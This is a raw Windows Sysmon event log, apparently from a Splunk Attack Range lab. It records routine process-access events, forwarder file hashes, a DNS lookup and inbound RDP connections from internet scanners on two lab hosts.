Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F7DD84E3DD403E29B64C51B65A110ED,SHA256=7CE258721963DC2ACBE2B2F48AF78D2B0636431A34F47C8577DB2B0C45AC5B86,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000082049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.578{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628support.content.office.net0type: 5 support.content.office.net.edgekey.net;type: 5 e584.g.akamaiedge.net;::ffff:104.75.88.23;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 10341000x800000000000000082048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:35.043{A7A01FEF-EC53-607E-6B0F-00000000BB01}36283092C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-7605-00000000BB01}4400C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdce3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc83|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdbf6|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd59d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso40uiwin32client.dll+2243ff|C:\Program Files\Common Files\Microsoft Shared\Office16\mso40uiwin32client.dll+221912|C:\Program Files\Common Files\Microsoft Shared\Office16\mso40uiwin32client.dll+2231d0|C:\Program Files\Common Files\Microsoft Shared\Office16\mso40uiwin32client.dll+21d9f2|C:\Program Files\Common Files\Microsoft Shared\Office16\mso98win32client.dll+1ba8ec|C:\Program Files\Common Files\Microsoft Shared\Office16\mso98win32client.dll+1ba7d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso98win32client.dll+a7036a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso98win32client.dll+a75a5d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso98win32client.dll+a700c4|C:\Program Files\Common Files\Microsoft Shared\Office16\mso98win32client.dll+9f4726|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+14f133|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2 23542300x800000000000000050810Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:35.855{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF3F25824353A7774069E8E62867FBD4,SHA256=42AC1A27F5BCCCDEB6BEBBD6CE96D07255C16284B8A7D36FE79E9C29295360E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050809Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:32.742{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52551-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000082074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.981{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5788F7121826B521449ABCC27447B200,SHA256=1A93A45C7A79FFDFE988BBB95DA980DEDA063EE4CD79961C0CF6CA1FF61E6909,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.574{A7A01FEF-B626-607E-0D00-00000000BB01}10084160C:\Windows\system32\svchost.exe{A7A01FEF-EAEF-607E-690B-00000000BB01}1188C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000082072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:34.046{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local62517- 10341000x800000000000000082071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.090{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050811Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:36.855{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA3A371D03F3FBB3E46B27B41492D272,SHA256=B270DDCB315192DF1D7E793B4216CBC63CBE8A25CA9F0D24E558B6D31EF31A53,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:37.715{A7A01FEF-B626-607E-0D00-00000000BB01}10084160C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000082078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:34.722{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63844-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:34.634{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-27661-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:34.395{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63997-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:34.171{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57654-false10.0.1.12-8000- 23542300x800000000000000050814Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:37.855{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF56CA8BFA12CAC3B1906781CF8915A8,SHA256=FF32CF66E23AC19A5560A3E360365C49D4324AF312D8695BF4769AA24A52B40D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050813Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:34.947{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64059-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050812Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:37.152{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8EF2822146B9E9EB9EFD55B32E2F76DB,SHA256=32A0431D02BA1268E6672CE9966250207AC08FF7872FA8FCDE8101861B4FF388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:38.434{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BC5F6B0FB7A329A5C0ECC5454949A72,SHA256=3F78AAEB537A48F221E7C05F8B4B4593A5218937EAFFF19CFE28680CA4AE70E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.201{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-26302-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:36.166{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-29020-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000082087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 